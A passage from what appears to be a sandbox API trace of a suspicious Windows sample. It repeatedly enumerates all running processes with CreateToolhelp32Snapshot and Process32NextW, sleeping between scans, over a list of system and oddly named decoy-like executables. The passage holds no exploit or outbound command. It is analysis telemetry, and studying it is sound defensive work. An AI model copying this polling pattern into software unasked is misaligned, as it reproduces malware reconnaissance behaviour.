cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0125.083] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0125.084] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0125.085] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0125.086] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0125.087] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0125.088] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0125.089] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0125.090] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0125.092] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0125.093] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0125.094] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0125.095] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0125.096] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0125.098] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0125.099] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0125.100] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0125.101] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0125.102] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0125.104] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0125.105] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0125.660] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0125.661] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0125.663] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0125.664] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0125.666] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0125.667] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0125.669] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0125.673] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0125.675] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0125.676] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0125.678] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0125.679] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0125.680] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0125.682] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0125.683] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0125.685] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0125.686] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0125.687] CloseHandle (hObject=0xbc) returned 1 [0125.687] Sleep (dwMilliseconds=0x12c) [0126.689] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0126.695] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0126.696] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0126.697] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0126.698] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, 
th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0126.699] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0126.699] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0126.700] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0126.701] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0126.702] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0126.703] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0126.704] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.705] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.705] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.706] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.707] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.708] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0126.709] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.710] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.711] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0126.712] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.714] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0126.715] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0126.717] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0126.718] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0126.720] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.721] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0126.723] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0126.724] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0126.769] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0126.770] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0126.771] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0126.772] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0126.773] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0126.775] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0126.776] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0126.777] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0126.778] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0126.779] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0126.780] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0126.782] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0126.783] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0126.784] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0126.785] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0126.786] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0126.788] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, 